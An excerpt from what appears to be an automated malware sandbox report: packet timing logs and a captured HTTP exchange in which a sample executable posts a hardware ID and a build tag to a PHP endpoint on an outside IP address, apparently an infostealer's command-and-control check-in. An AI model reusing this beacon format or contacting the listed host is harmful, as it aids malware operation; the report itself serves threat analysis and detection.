Jul 1, 2024 13:02:15.412790060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.412811995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.417073965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417099953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417109966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417129040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.417150021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.417191029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417201042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417212009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417228937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.417268991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.417314053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417324066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.417365074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.417434931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.421473026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421484947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421495914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421520948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.421529055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421540022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421549082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.421551943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421562910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421582937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.421627998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.421627998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.421674013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.426275015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426312923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426322937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426322937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.426348925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.426362991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.426408052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426419973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426429987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426441908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426450968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.426465988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.426500082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.426527977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.426565886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.430066109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430093050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430100918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430116892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.430136919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.430149078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.430190086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430200100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430211067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430238962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.430244923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430255890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.430267096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.430294991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.433289051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433300018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433310032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433335066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.433361053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.433361053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433372021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433382988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433393002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433412075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.433430910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.433461905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.433501005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.435453892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435499907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435504913 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.435511112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435539007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.435558081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.435609102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435619116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435628891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435637951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435647011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.435647011 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.435673952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.435715914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.438579082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438617945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438623905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.438626051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438654900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.438676119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.438694954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438705921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438719034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438730001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438741922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.438774109 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.438802958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.438843012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.439985037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440011024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440018892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440042973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.440073013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.440104008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440114975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440124989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440135956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440143108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.440155029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.440176010 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.440217972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.440258980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.443012953 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443047047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443058014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443061113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.443089962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.443110943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.443169117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443180084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443190098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443203926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443208933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.443228960 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.443264008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.443278074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.443320036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.445030928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.445070982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.445082903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.445090055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.445116997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.445121050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.445158958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.536582947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.541449070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.735970020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.735981941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736027956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736062050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736176014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736219883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736219883 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736229897 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736269951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736330032 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736341000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736367941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736382008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736443996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736454964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736464977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736474037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.736493111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736500025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.736531973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769387960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769450903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769454002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769465923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769493103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769512892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769601107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769612074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769623041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769634008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769640923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769671917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769711971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769840002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769850016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769860983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769871950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769874096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769874096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769884109 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769893885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769905090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769910097 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769916058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.769927979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769952059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.769978046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.770294905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.770337105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.770342112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.770353079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.770375967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.770392895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.770428896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.770466089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.779028893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.779071093 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.779082060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.779083014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.779107094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.779175997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.779211998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.781291008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.781333923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.781342983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.781354904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.781375885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.781395912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.781411886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.781455994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.784446955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.784459114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.784468889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.784477949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.784492016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.784523964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.785797119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.785809040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.785820007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.785835981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.785840034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.785865068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.788589001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.788624048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.788630009 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.788634062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.788655043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.788661957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.788678885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.788691998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.790240049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.790251970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.790261984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.790287971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.790312052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.790321112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.790334940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.790365934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.792821884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.792860031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.792870045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.792874098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.792892933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.792911053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.792983055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.793025970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.795344114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.795388937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.795389891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.795401096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.795423031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.795429945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.795443058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.795461893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.796389103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.796477079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.796489000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.796502113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.796513081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.796521902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.796539068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.796555042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.798636913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.798674107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.798676968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.798685074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.798703909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.798722029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.798759937 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.799902916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.799932957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.799942017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.799943924 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.799994946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:15.799999952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:15.800030947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.395179033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.395412922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.400049925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.400263071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.400274038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.653110981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.653240919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.762809992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.767667055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.969795942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.969820023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.969829082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:16.969899893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.969899893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.972817898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:16.977643013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:17.174745083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:17.175127983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:17.176162004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:17.180972099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:17.377650976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:17.377720118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:21.082607985 CEST	49705	80	192.168.2.5	147.45.78.162

HTTP Request Dependency Graph

147.45.78.162

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	147.45.78.162	80	2380	C:\Users\user\Desktop\jlO7971vUz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 13:02:04.635837078 CEST	416	OUT	POST /a17861b9cb6f1a53.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDB Host: 147.45.78.162 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 46 34 30 34 37 33 46 34 41 30 32 37 34 30 37 32 35 36 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 31 32 33 52 65 62 6f 72 6e 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="hwid"8CF40473F4A02740725608------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="build"123Reborn------KKJDGDHIDBGIECBGHJDB--
Jul 1, 2024 13:02:05.286508083 CEST	461	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 11:02:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 266 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data 